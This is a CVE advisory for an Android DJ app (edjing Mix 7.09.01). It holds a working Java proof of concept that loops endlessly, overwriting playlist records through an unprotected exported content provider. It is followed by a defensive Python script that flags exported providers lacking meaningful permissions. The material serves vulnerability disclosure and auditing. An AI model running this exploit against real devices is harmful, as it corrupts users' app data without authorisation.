CVE-2023-29734: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs

An issue found in edjing Mix v.7.09.01 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the database.


Escalation of Privileges exists in edjing Mix (CVE-2023-29734)

Vendor: MWM (http://www.edjing.com/)

Affected product: edjing Mix (com.edjing.edjingdjturntable)

Version: 7.09.01

Download link: https://play.google.com/store/apps/details?id=com.edjing.edjingdjturntable

Description of the vulnerability for use in the CVE: An issue found in edjing Mix v.7.09.01 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the database.

PoC:

    import android.content.ContentResolver;
    import android.content.ContentValues;
    import android.net.Uri;
    import java.util.Random;

    // Runs in a component (a Context) of a separate, unauthorized app.
    public void attack() {
        while (true) {
            ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
            String randomString = getRandomString(52);   // not used further in the PoC
            String randomString2 = getRandomString(5120);
            Uri uri = Uri.parse("content://com.edjing.edjingdjturntable/playlist");
            ContentValues contentValues = new ContentValues();
            contentValues.put("playlist_id", 3);
            contentValues.put("playlist_date_modified", 1314234);
            contentValues.put("playlist_date_added", 123456);
            contentValues.put("playlist_state", 0);
            contentValues.put("playlist_name", randomString2);
            // No selection or selection arguments are passed with the update.
            contentResolver.update(uri, contentValues, null, null);
        }
    }

    // Builds a random alphanumeric string of the requested length.
    public static String getRandomString(int length) {
        String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        Random random = new Random();
        StringBuffer sb = new StringBuffer();
        for (int i = 0; i < length; i++) {
            int number = random.nextInt(62);
            sb.append(str.charAt(number));
        }
        return sb.toString();
    }
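The PoC works only because the playlist provider accepts `update()` from an app that holds no permission. The following is an added example, not part of the original advisory or the app's code: a Python check that audits a decoded `AndroidManifest.xml` for exported providers with no meaningful read or write permission. The sample manifest is constructed; only the first authority comes from the PoC URI, and the package, class and permission names are hypothetical.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed manifest, NOT the app's real one. Only the first authority comes
# from the PoC URI; package, class and permission names are hypothetical.
SAMPLE_MANIFEST = """<manifest
    xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.dj">
  <uses-sdk android:targetSdkVersion="31"/>
  <permission android:name="com.example.perm.SYNC" android:protectionLevel="signature"/>
  <application>
    <provider android:name=".PlaylistProvider" android:exported="true"
        android:authorities="com.edjing.edjingdjturntable"/>
    <provider android:name=".SyncProvider" android:exported="true"
        android:authorities="com.example.sync"
        android:writePermission="com.example.perm.SYNC"/>
    <provider android:name=".CacheProvider" android:authorities="com.example.cache"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Return (authority, operation, reason) for each provider operation that
    another installed app could perform without a meaningful permission."""
    root = ET.fromstring(manifest_xml)
    sdk = root.find("uses-sdk")
    # Simplification: only targetSdkVersion is read; unknown is treated as old.
    target = int(sdk.get(A + "targetSdkVersion", "0")) if sdk is not None else 0
    # Permissions a third-party app can obtain; protectionLevel defaults to normal.
    weak = {p.get(A + "name") for p in root.findall("permission")
            if p.get(A + "protectionLevel", "normal").split("|")[0]
            in ("normal", "dangerous")}
    app = root.find("application")
    findings = []
    for prov in app.findall("provider"):
        exported = prov.get(A + "exported")
        # With no attribute, a provider is exported only when targeting API <= 16.
        if not (exported == "true" if exported is not None else target <= 16):
            continue
        authority = prov.get(A + "authorities")
        base = prov.get(A + "permission") or app.get(A + "permission")
        for op in ("read", "write"):
            guard = prov.get(A + op + "Permission") or base
            if guard is None:
                findings.append((authority, op, "no permission"))
            elif guard in weak:
                findings.append((authority, op, "weak permission " + guard))
    return findings
```

The check does not evaluate `path-permission` or `grantUriPermissions` entries, so a clean result still needs a manual look at those.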
